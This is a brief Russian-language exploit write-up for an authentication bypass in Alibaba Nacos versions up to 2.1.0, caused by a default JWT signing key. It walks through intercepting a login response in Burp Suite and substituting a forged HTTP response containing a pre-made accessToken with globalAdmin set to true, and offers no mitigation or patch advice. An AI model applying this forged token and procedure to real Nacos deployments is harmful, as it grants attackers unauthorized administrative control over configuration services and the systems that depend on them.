
Alibab Nacos Unauthorized Login
Обнаружена проблема в Nacos, затрагивающая Nacos <= 2.1.0. Пользователи Nacos используют ключ JWT по умолчанию, что приводит к уязвимости несанкционированного доступа. Через эту уязвимость злоумышленники могут обойти аутентификацию по имени пользователя и паролю и напрямую войти в систему Nacos
Версия Nacos <= 2.1.0
Шаг 1: Перейдите на сайт Nacos, введите любые имя пользователя и пароль и перехватите запрос с помощью Burpsuite.

Шаг 2: Перехватите ответный пакет.

Шаг 3: Измените пакет данных следующим образом
HTTP/1.1 200
Date: Thu, 10 Nov 2022 01:27:16 GMT
Content-Type: application/json
Content-Length: 13
Connection: close
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Server: elb
{"accessToken":"eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTYxODEyMzY5N30.nyooAL4OMdiByXocu8kL1ooXd1IeKj6wQZwIH8nmcNA","tokenTtl":18000,"globalAdmin":true}

Шаг 4: После отправки пакета данных вы успешно войдете в систему.
